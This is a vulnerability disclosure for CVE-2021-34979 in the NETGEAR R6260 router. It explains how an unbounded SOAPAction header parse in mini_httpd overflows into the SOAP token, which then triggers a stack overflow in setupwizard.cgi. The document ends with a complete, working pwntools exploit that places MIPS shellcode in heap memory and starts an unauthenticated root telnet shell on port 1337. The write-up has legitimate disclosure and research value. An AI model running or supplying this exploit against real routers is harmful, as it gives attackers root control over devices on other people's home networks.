CVE: CVE-2021-34979
Tested Versions:
Product URL(s):
This vulnerability allows for an attacker with LAN access to a NETGEAR R6260 router to execute arbitrary code. This was tested on the latest firmware available for the router, V1.1.0.78_1.0.1 at the point of writing.
A buffer overflow in mini_httpd.c:1768 allows for unexpectedly long environment variables to be passed to the setupwizard.cgi executable. When setupwizard.cgi is executed via a specially crafted HTTP SOAP request, an unbounded strcat() in the check_soap_login_record() function allows for instruction pointer control when the environment variable SOAP_LOGIN_TOKEN is sufficiently long. An attacker can use this to execute arbitrary code as root.
The webservice running in the R6260 device is mini_httpd. It is an opensource project. The source code can be download from the Netgear webside : “https://www.downloads.netgear.com/files/GPL/R6260_R6350_R6850_R6330_V1.1.0.76_1.0.1_gpl.tgz". After extracting the tgz file, the mini_httpd source code is in the folder “R6260_V1.1.0.76_src/sc_trunk/user_space/apps/public/mini_httpd/mini_httpd-1.24/mini_httpd.c”
The handle_request
(mini_httpd.c:1558) function is invoked to handle incoming HTTP request. In this function, HTTP headers are handled, specifically the SOAPAction
header is parsed as follow:
mini_httpd.c:1756
else if (strncasecmp(line, "SOAPAction:", 11) == 0)
{
char *pTemp = NULL;
cp = &line[11];
cp += strspn(cp, " \t");
pTemp = strcasestr(cp, "urn:NETGEAR-ROUTER:service:");
if (pTemp != NULL)
{
int i = 0;
pTemp += strlen("urn:NETGEAR-ROUTER:service:");
while (*pTemp != ':' && *pTemp != '\0')
{
soapServiceName[i++] = *pTemp; // <-- Out-Of-Bounds Write
pTemp++;
}
if((pTemp=strstr(pTemp,"#")) != NULL)
{
if ( *(pTemp+1) != '\0')
{
snprintf(soapActionName,sizeof(soapActionName),"%s",pTemp+1);
}
}
soapServiceName[i] = '\0';
for_setupwizard = 1;
}
}
The SOAP service name is stored one by one byte in a global array soapServiceName
. But there is no bounds check when increase the value of variable i
, it leads to write past end of soapServiceName
buffer.
The soapServiceName
is declared as follow:
mini_httpd:437
static char soapServiceName[128] = "";
static char soapActionName[128] = "";
static char soap_token[17] = "";
Since we can write past end of soapServiceName
buffer, we can overwrite the data in soap_token
array by a long string.
In next step, when the cgi binary is executed, mutiple environment variables are create to pass data to the cgi process. It is done by the make_envp
function (mini_httpd:3349). The soap_token
is passed to the cgi process as well:
mini_httpd:3389
if (soap_token[0] != '\0')
envp[envn++] = build_env("SOAP_LOGIN_TOKEN=%s", soap_token);
Summary, we can pass a long SOAP token into cgi process.
The cgi binary is setupwizard.cgi. When the HTTP request is handled by this binary, the function check_soap_login_record
is invoked to check if user is auth or not.
bool check_soap_login_record()
{
v0 = getenv("REMOTE_ADDR");
v1 = getenv("SOAP_LOGIN_TOKEN");
TRACE("soap token %s\n", v1);
v22[0] = 0;
v22[1] = 0;
v22[2] = 0;
v22[3] = 0;
v23 = 0;
memset(v24, 0, sizeof(v24));
v25[0] = 0;
v25[1] = 0;
v25[2] = 0;
v25[3] = 0;
v25[4] = 0;
v25[5] = 0;
v25[6] = 0;
v25[7] = 0;
v25[8] = 0;
v2 = fopen("/dev/console", "a+");
if ( v2 )
{
fprintf(v2, "[%s::%s():%d] ", "soap_login.c", "check_soap_login_record", 670);
fprintf(v2, "start check soap login record! token (%s)\n", v1);
fclose(v2);
}
v3 = get_mac_from_ip(v0, v22);
v4 = 1;
if ( !v3 )
{
strcat((char *)v25, (const char *)v22);
v5 = (char *)v25 + strlen((const char *)v25);
*v5 = 44;
v5[1] = 0;
strcat((char *)v25, v1);
...
(The above code snippet is generated by id, corresponding to assembly code from address 0x004261EC)
The v1
pointer points to buffer store “SOAP_LOGIN_TOKEN” environment variable. As explain above, this environment variable can be aribitrary size.
Then, when strcat
function is invoked to concatenate 2 buffer v25
and v1
, the stack buffer overflow can be occurred.
Notice that the heap segment of setupwizard
process is executable and its loaded address is constant. Therefore in my exploit, I store shellcode in heap memory (in “encoding” attribute of xml tag) and jump to it by overwriting the save return address in stack.
The heap chunk to store the shellcode is allocated in the function sub_40764C
.
The setupwizard.cgi process can be debug using gdbserver (https://raw.githubusercontent.com/rapid7/embedded-tools/master/binaries/gdbserver/gdbserver.mipsle) The step to debug the setupwizard.cgi is as follow:
pause()
command before send soap data, as follow:sl(b'Content-Type: application/x-www-form-urlencoded')
sl(b'')
pause()
sl(soap_data)
In the router, you can see there is a setupwizard.cgi running, then run gdbserver to attach to setupwizard.cgi
process
Run gdb-multiarch to connect to remote gdbserver, and now you can debug the setupwizard.cgi process.
from pwn import *
context.arch = 'mips'
context.endian = 'little'
#context.log_level = 'debug'
def send_SOAP(service: bytes, soap_data: bytes) -> bytes:
# Note that requests.post will not work here, because malformed HTTP headers will raise errors
r = remote('routerlogin.net', 80)
def sl(s:bytes): r.send(s+b'\r\n')
sl(b'POST / HTTP/1.1')
sl(b'Host: routerlogin.net')
sl(b'Accept: */*')
sl(b'User-Agent: pwnt')
sl(b'SOAPAction:\t⚱NETGEAR-ROUTER:service:' + service + b':')
sl(b'Content-Length: ' + str(len(soap_data)).encode())
sl(b'Content-Type: application/x-www-form-urlencoded')
sl(b'')
pause()
sl(soap_data)
return r.recvall(timeout=60)
def run_shell_cmd(cmd: str):
pad = 0x80*2 + 4*2 + 0x200
RIP = 0x791036+2 # this is the location of the encoding="AA...." string in the heap. The heap location is not randomised by ASLR.
soap_data = b"\n" * 0x10 + b"""<?xml version='1.0' encoding="AA%s"?>
<SOAP-ENV:Envelope SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<help:ignore abcdef='abcdef'>aaa</help:ignore>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""
shellcode = shellcraft.pushstr(cmd)
shellcode+= shellcraft.mov('$a0', '$sp')
shellcode+= '\t\tlw\t$t9,-31360($gp)\n' # this is the location of system()
shellcode+= shellcraft.mov('$a0', '$sp')# These repeats are just NOPs
shellcode+= '\t\tjalr $t9\n'
shellcode+= shellcraft.mov('$a0', '$sp')
soap_data = soap_data % asm(shellcode, vma=RIP)
print(send_SOAP(pad*b'A' + b'a'*cyclic_find(b'aaia') + pack(RIP)[:3], soap_data))
run_shell_cmd('/sbin/telnetd -l /bin/sh -p 1337')
# This will enable a no-authentication telnet shell at routerlogin.net:1337.